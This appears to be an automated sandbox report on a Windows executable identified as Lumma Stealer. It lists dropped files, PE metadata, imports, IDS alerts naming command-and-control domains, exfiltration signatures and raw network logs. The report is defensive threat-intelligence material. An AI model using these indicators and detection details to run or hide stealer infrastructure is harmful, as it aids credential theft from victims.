SSDEEP:	384:OBtMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwp1wJ+L06RRyj4T35ub/Y3jFd474W:UMkbJrT8IeQc5dNy6oj4L5uTY3Jg
MD5:	44D3925643BF25FA026B31E76EFAC5D4
SHA1:	F713A33CEDE9B2C808ED8DDEE2978FF35EB69164
SHA-256:	F5C3F138B6F9E5794513AB5272E5A8220DA3E27F16516283280006415115EF8B
SHA-512:	4D3722F052CFBF09DAFFCC07CD5FA57319E4F5E938E916983635541A25B59E8A239F61CBCDBE88FBDF73B4B3855B0AF3A6A71F556264CC64F7DF11BB6BB7380C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379780575703241","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd1

Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	49120
Entropy (8bit):	0.0017331682157558962
Encrypted:	false
SSDEEP:	3:Ztt:T
MD5:	0392ADA071EB68355BED625D8F9695F3
SHA1:	777253141235B6C6AC92E17E297A1482E82252CC
SHA-256:	B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
SHA-512:	EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Temp\ZLOVRFvt\Q13Hi3dPshjDHTjm.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	43
Entropy (8bit):	4.469999278451778
Encrypted:	false
SSDEEP:	3:N8DSLUxGTKSEIY/nN7n:2OLUxGF5YN
MD5:	7C9CDF67554CFF98AF8B1D1F0BD074A1
SHA1:	282F53D7915D8666E164CF9EBD54D67E081C9CCD
SHA-256:	1DE23C52A9785F1C164EDB5FB6452034099ECC5E444882CC533F60575EE0B282
SHA-512:	9E369D74CFBC6ADEE24983ACF5B59326D620EB590FAFA60888667D7B63449A096357396FB0676F9CBF976A078E6FD07F2EA7C370A89CC246831A2BDBFA72864E
Malicious:	false
Preview:	https://www.youtube.com/watch?v=wjIuS_rQQsY

Process:	C:\Users\user\AppData\Local\Temp\89TY9V9WIQJRU6EB7DK4LP.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	167
Entropy (8bit):	4.43745738033235
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLGWbRIwcWWGu:q43tISl6kXiMIWSU6XlI55bRIpfGu
MD5:	0104C301C5E02BD6148B8703D19B3A73
SHA1:	7436E0B4B1F8C222C38069890B75FA2BAF9CA620
SHA-256:	446A6087825FA73EADB045E5A2E9E2ADF7DF241B571228187728191D961DDA1F
SHA-512:	84427B656A6234A651A6D8285C103645B861A18A6C5AF4ABB5CB4F3BEB5A4F0DF4A74603A0896C7608790FBB886DC40508E92D5709F44DCA05DD46C8316D15BF
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>cloudflare</center>..</body>..</html>..

Process:	C:\Users\user\Desktop\T4qO1i2Jav.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	117248
Entropy (8bit):	6.333836706006904
Encrypted:	false
SSDEEP:	3072:CC9B/Kew7ujs3qleSQZ8Tn0RvFQv/Vh2iwqx4QFQ:CCT/c93qEu0MnFQ
MD5:	E10B81593D71C9C094F3D9D97C65F237
SHA1:	C873F28DA64112FDC499CF3F54E62EBCD3037B8D
SHA-256:	3CB59D3C3117F1659C6CF6EA87A2A0FE5549190F2342F8985042736D9212CB30
SHA-512:	26F5629FB69944CA5C4298BA1743DF0CB89B5230160FE0D396EC6734D59B7440ECCC964DE24A82CD8CFAAB84F89E8C5A5C5D5555B27CD7DAB55853C485217787
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.,.~.B.~.B.~.B.5.A.t.B.5.G..B.oA.h.B.oF.l.B.oG.Q.B.5.F.k.B.5.C.u.B.~.C..B..K.}.B......B..@...B.Rich~.B.........PE..L.....ng...........................s.......@....@.......................................@....................................x...............................4...8...p...........................x...@............@..p............................text....).......*.................. ..`.rdata..dx...@...z..................@..@.data...4...........................@....rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................................................

File type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.160314003290711
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	T4qO1i2Jav.exe
File size:	874'496 bytes
MD5:	2d883950e8e1886bb567d041d17f22db
SHA1:	e216b58e8df9af53b3dd8650b281c15d14786ce7
SHA256:	4d03f680f20bb38f0ec7db840f1c783389e13e8488545a6c9d8aab30cbfd93dd
SHA512:	c457a17d01202f8320a0509528ccec7e61027043bcc160d7c45151f019b9371ebe78b59978b44aedcc47cca40d0fd6e903758e27bc7665f1844fbfe1df54a65f
SSDEEP:	12288:fsqkPBQEIFnt/yQbXdDnz7pTCes2iRmmtCvxTSYp7lUjI8zD274rlmu4Y:ftgBE/yQbXpz7pTCes2iRAjlGrfr
TLSH:	D4058D67611394F6CC3316F24987BBEFE620CE1D84220A1FE7488D64EBF6910757E266
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......................(.....T....................@.................................o.....@... ............................

Entrypoint:	0x401307
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x406bd9, 0x406ba8, 0x410774
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e83be636913a91ed7c5d5aef532bc05d

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a000	0xe0c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8d000	0x49944	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd7000	0x4944	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x81858	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8a258	0x208	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7a250	0x7a400	0d972b9e1bc2abf7a9f03fe4766abbcb	False	0.3918352185582822	data	6.311758769777413	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x7c000	0x1310	0x1400	51dcebd9a68cfdcea89911290a54e5d0	False	0.06484375	data	0.6893423575105656	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x7e000	0xa3d8	0xa400	75e8effa1a49aa417f3a70d39a876e01	False	0.29506478658536583	data	5.543265176793312	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x89000	0xad4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x8a000	0xe0c	0x1000	d540bee2b9f5c9784a265aefb5468f43	False	0.296630859375	data	4.42433236204921	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x8b000	0x34	0x200	1d1527587aa546cad1face2659be5dfd	False	0.068359375	data	0.28187555731160896	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x8c000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x8d000	0x49944	0x49a00	fcdb3b1e60969dae2696e96a5955f99b	False	0.8990575923174873	Matlab v4 mat-file (little endian) \310, numeric, rows 0, columns 4, imaginary	7.7315670720604786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd7000	0x4944	0x4a00	92dfc814a99b9bb6a2d957cdb1e3ea7a	False	0.65625	data	6.633200714215997	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	ZLIB Complexity
7IZEVMM=	0x8d90c	0x32d	data	1.013530135301353
=E7O;LY	0x8dc3c	0x2e71	data	0.9230381024476407
E9YL}8XO57FVY;5=~TOZK	0x90ab0	0x2a0a	data	0.9297528340457164
HQY9OQ\|=^KUUEV	0x934bc	0x231d	data	0.9514962732228279
IHJ<ZY	0x957dc	0x2e29	data	0.932047050858932
K6ZSFNPIO}S=JR7MP	0x98608	0x413	data	1.0105465004793863
NL^R9ZGQKL\	0x98a1c	0x1319	data	0.9404786254857844
NUUKKEQW]TL^MK\NT4PR	0x99d38	0x2f9f	data	0.9159215814945452
OEK=H<YGTUIOTQHLL5HK	0x9ccd8	0x3641	data	0.9323925408596732
OOZL{QWMF~WYPQ	0xa031c	0xfb9	data	0.9572670807453416
QRYOI^YU\SOFM{	0xa12d8	0x20d0	data	0.9332142857142857
SQHT^O	0xa33a8	0x2f34	data	0.9177424693809997
S{<PX8[:FNU]J]J{Q{RMP]	0xa62dc	0x35f3	data	0.9232495836651944
UTQG	0xa98d0	0x1b3	ASCII text	0.8091954022988506
UZSK\RZZXV<N:5U	0xa9a84	0x1578	data	0.9541484716157205
U[WF47U	0xaaffc	0x2db5	data	0.9382104093667208
VO7R	0xaddb4	0x5e	ASCII text, with no line terminators	0.9042553191489362
YUFL4P4ZJ^<R8	0xade14	0x31f6	data	0.9255668491008601
YV<M{TUF7FF	0xb100c	0x1f77	data	0.9437616387337058
YYPO^RWOGTS~NNZX	0xb2f84	0x1f31f	data	0.8976403834865976
Z~R6RESX\EMZ	0xd22a4	0x1994	data	0.8407147220525352
\\|STG5UPQ]VFZVLVVXHJ	0xd3c38	0x277c	data	0.934408389394539
{LMX=ZJF]\|YV5SO\|	0xd63b4	0x58d	data	1.007741027445461

DLL	Import
KERNEL32.dll	CloseHandle, CreateEventA, CreateFileMappingA, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, FindResourceA, FormatMessageA, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetHandleInformation, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, LoadResource, LocalFree, LockResource, MapViewOfFile, MultiByteToWideChar, OpenProcess, OutputDebugStringA, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReleaseSemaphore, ResetEvent, ResumeThread, SetEvent, SetLastError, SetProcessAffinityMask, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SizeofResource, Sleep, SuspendThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnmapViewOfFile, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _beginthreadex, _cexit, _endthreadex, _errno, _initterm, _iob, _lock, _onexit, _setjmp3, _unlock, _vsnprintf, _vsnwprintf, abort, atoi, calloc, exit, fgetwc, fprintf, fputc, fputs, free, getc, getenv, iswctype, localeconv, longjmp, malloc, memchr, memcmp, memcpy, memmove, memset, printf, realloc, setlocale, signal, strchr, strcmp, strcoll, strcpy, strerror, strftime, strlen, strncmp, strtol, strtoul, strxfrm, towlower, towupper, vfprintf, wcscoll, wcsftime, wcslen, wcsxfrm, _strdup, _read
USER32.dll	ShowWindow

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T14:42:09.122907+0100	2057925	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.4	61200	1.1.1.1	53	UDP
2024-12-27T14:42:09.122907+0100	2057973	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.4	61200	1.1.1.1	53	UDP
2024-12-27T14:42:09.265303+0100	2057945	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.4	53382	1.1.1.1	53	UDP
2024-12-27T14:42:09.265303+0100	2057983	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.4	53382	1.1.1.1	53	UDP
2024-12-27T14:42:09.437617+0100	2057949	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.4	54475	1.1.1.1	53	UDP
2024-12-27T14:42:09.437617+0100	2057981	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.4	54475	1.1.1.1	53	UDP
2024-12-27T14:42:09.578842+0100	2057929	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.4	53193	1.1.1.1	53	UDP
2024-12-27T14:42:09.578842+0100	2057979	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.4	53193	1.1.1.1	53	UDP
2024-12-27T14:42:09.733567+0100	2057931	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.4	62926	1.1.1.1	53	UDP
2024-12-27T14:42:09.733567+0100	2057977	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.4	62926	1.1.1.1	53	UDP
2024-12-27T14:42:09.877345+0100	2057927	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.4	54389	1.1.1.1	53	UDP
2024-12-27T14:42:09.877345+0100	2057975	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.4	54389	1.1.1.1	53	UDP
2024-12-27T14:42:10.018486+0100	2057943	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.4	58534	1.1.1.1	53	UDP
2024-12-27T14:42:10.018486+0100	2057971	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.4	58534	1.1.1.1	53	UDP
2024-12-27T14:42:10.162558+0100	2057935	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.4	52216	1.1.1.1	53	UDP
2024-12-27T14:42:10.162558+0100	2057969	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.4	52216	1.1.1.1	53	UDP
2024-12-27T14:42:11.921542+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	23.55.153.106	443	TCP
2024-12-27T14:42:12.730937+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49730	23.55.153.106	443	TCP
2024-12-27T14:42:14.330863+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-27T14:42:15.095213+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-27T14:42:15.095213+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-27T14:42:16.389119+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	172.67.157.254	443	TCP
2024-12-27T14:42:17.160764+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49732	172.67.157.254	443	TCP
2024-12-27T14:42:17.160764+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	172.67.157.254	443	TCP
2024-12-27T14:42:18.761336+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	172.67.157.254	443	TCP
2024-12-27T14:42:21.245333+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	172.67.157.254	443	TCP
2024-12-27T14:42:23.878487+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	172.67.157.254	443	TCP
2024-12-27T14:42:27.144538+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	172.67.157.254	443	TCP
2024-12-27T14:42:27.842002+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49736	172.67.157.254	443	TCP
2024-12-27T14:42:30.436585+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	172.67.157.254	443	TCP
2024-12-27T14:42:35.064340+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	172.67.157.254	443	TCP
2024-12-27T14:42:35.804266+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49743	172.67.157.254	443	TCP
2024-12-27T14:42:37.451791+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	172.67.182.218	443	TCP
2024-12-27T14:42:43.026607+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49746	172.67.182.218	443	TCP
2024-12-27T14:42:45.999563+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49747	172.67.161.29	80	TCP
2024-12-27T14:42:48.583999+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49750	172.67.182.218	443	TCP
2024-12-27T14:42:52.337631+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49751	172.67.161.29	80	TCP
2024-12-27T14:43:14.211341+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49839	172.67.161.29	80	TCP
2024-12-27T14:43:44.727669+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	50070	172.67.161.29	80	TCP
2024-12-27T14:44:19.061984+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	50201	172.67.161.29	80	TCP

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 14:42:09.122906923 CET	61200	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:42:09.261184931 CET	53	61200	1.1.1.1	192.168.2.4
Dec 27, 2024 14:42:09.265302896 CET	53382	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:42:09.407752991 CET	53	53382	1.1.1.1	192.168.2.4
Dec 27, 2024 14:42:09.437617064 CET	54475	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:42:09.575681925 CET	53	54475	1.1.1.1	192.168.2.4
Dec 27, 2024 14:42:09.578841925 CET	53193	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:42:09.718868971 CET	53	53193	1.1.1.1	192.168.2.4
Dec 27, 2024 14:42:09.733566999 CET	62926	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:42:09.872822046 CET	53	62926	1.1.1.1	192.168.2.4
Dec 27, 2024 14:42:09.877345085 CET	54389	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:42:10.015021086 CET	53	54389	1.1.1.1	192.168.2.4
Dec 27, 2024 14:42:10.018486023 CET	58534	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:42:10.158490896 CET	53	58534	1.1.1.1	192.168.2.4
Dec 27, 2024 14:42:10.162558079 CET	52216	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:42:10.299870968 CET	53	52216	1.1.1.1	192.168.2.4
Dec 27, 2024 14:42:10.303244114 CET	58644	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:42:10.441526890 CET	53	58644	1.1.1.1	192.168.2.4
Dec 27, 2024 14:42:12.959965944 CET	61704	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:42:13.100765944 CET	53	61704	1.1.1.1	192.168.2.4
Dec 27, 2024 14:42:35.807384014 CET	58987	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:42:36.118206024 CET	53	58987	1.1.1.1	192.168.2.4
Dec 27, 2024 14:42:44.355356932 CET	56997	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:42:44.677547932 CET	53	56997	1.1.1.1	192.168.2.4
Dec 27, 2024 14:43:01.851425886 CET	64183	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:43:01.851677895 CET	58652	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:43:01.992644072 CET	53	64183	1.1.1.1	192.168.2.4
Dec 27, 2024 14:43:02.085810900 CET	53	58652	1.1.1.1	192.168.2.4
Dec 27, 2024 14:43:02.542509079 CET	52612	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:43:02.542701006 CET	53555	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:43:02.546941042 CET	55784	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:43:02.547112942 CET	52524	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:43:02.679522991 CET	53	53555	1.1.1.1	192.168.2.4
Dec 27, 2024 14:43:02.679791927 CET	53	52612	1.1.1.1	192.168.2.4
Dec 27, 2024 14:43:02.684068918 CET	53	52524	1.1.1.1	192.168.2.4
Dec 27, 2024 14:43:02.684283018 CET	53	55784	1.1.1.1	192.168.2.4
Dec 27, 2024 14:43:02.847651005 CET	61601	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:43:02.850097895 CET	59755	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:43:02.986130953 CET	53	61601	1.1.1.1	192.168.2.4
Dec 27, 2024 14:43:02.988940001 CET	53	59755	1.1.1.1	192.168.2.4
Dec 27, 2024 14:43:06.236499071 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:06.629743099 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:07.296506882 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:07.404985905 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:07.405046940 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:07.405057907 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:07.405091047 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:07.468751907 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:07.469129086 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:07.517844915 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:07.611915112 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:07.783093929 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:07.783303022 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:07.783329010 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:07.783341885 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:07.831741095 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:07.878571033 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:07.878657103 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:08.192846060 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:08.368489027 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:08.389390945 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:08.395064116 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:08.704476118 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:08.705122948 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:08.709579945 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:08.710208893 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:08.723819971 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:11.079957962 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:11.080137014 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:11.395219088 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:11.397319078 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:11.397902012 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:11.413748026 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:11.973880053 CET	63023	443	192.168.2.4	172.64.41.3
Dec 27, 2024 14:43:12.330363989 CET	63023	443	192.168.2.4	172.64.41.3
Dec 27, 2024 14:43:13.014120102 CET	63023	443	192.168.2.4	172.64.41.3
Dec 27, 2024 14:43:13.067670107 CET	443	63023	172.64.41.3	192.168.2.4
Dec 27, 2024 14:43:13.067739964 CET	443	63023	172.64.41.3	192.168.2.4
Dec 27, 2024 14:43:13.067754030 CET	443	63023	172.64.41.3	192.168.2.4
Dec 27, 2024 14:43:13.067776918 CET	443	63023	172.64.41.3	192.168.2.4
Dec 27, 2024 14:43:13.153182030 CET	63023	443	192.168.2.4	172.64.41.3
Dec 27, 2024 14:43:13.154412031 CET	63023	443	192.168.2.4	172.64.41.3
Dec 27, 2024 14:43:13.161968946 CET	63023	443	192.168.2.4	172.64.41.3
Dec 27, 2024 14:43:13.344016075 CET	443	63023	172.64.41.3	192.168.2.4
Dec 27, 2024 14:43:13.477408886 CET	443	63023	172.64.41.3	192.168.2.4
Dec 27, 2024 14:43:13.477495909 CET	443	63023	172.64.41.3	192.168.2.4
Dec 27, 2024 14:43:13.477504969 CET	443	63023	172.64.41.3	192.168.2.4
